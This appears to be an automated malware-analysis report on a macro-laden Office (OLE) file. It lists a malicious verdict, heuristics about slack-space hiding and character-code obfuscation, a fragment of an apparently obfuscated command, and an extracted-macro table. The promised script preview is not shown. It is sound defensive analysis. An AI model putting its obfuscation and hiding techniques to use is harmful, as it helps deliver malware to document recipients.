Verdict: MALICIOUS
Risk Score: 62
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic
The sample is an OLE document with a significant amount of slack space and detected VBA macros. The VBA macro attempts to construct a string using character codes, which is a common technique for obfuscating malicious commands or URLs. The constructed string 'HeLL ( [cHA' is likely the beginning of a command or URL used to download and execute a second-stage payload.
Heuristics (3)
- OLE document has large unaccounted-for region (severity: high, OLE_SLACK_ANOMALY): the OLE file is 100,864 bytes but its declared streams total only 35,549 bytes; the remaining 65,315 bytes (65%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- VBA macros detected (severity: medium, OLE_VBA_MACROS): the document contains VBA macro code.
- Embedded URL (severity: info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11835 bytes | f1a3432dbf04ed24f2faedab2f2cb0f5feed5ac0c72ddaa7942f0a3e07aa8b41 |
Script preview: first 1,000 lines of the extracted script (obfuscated VBA source, truncated).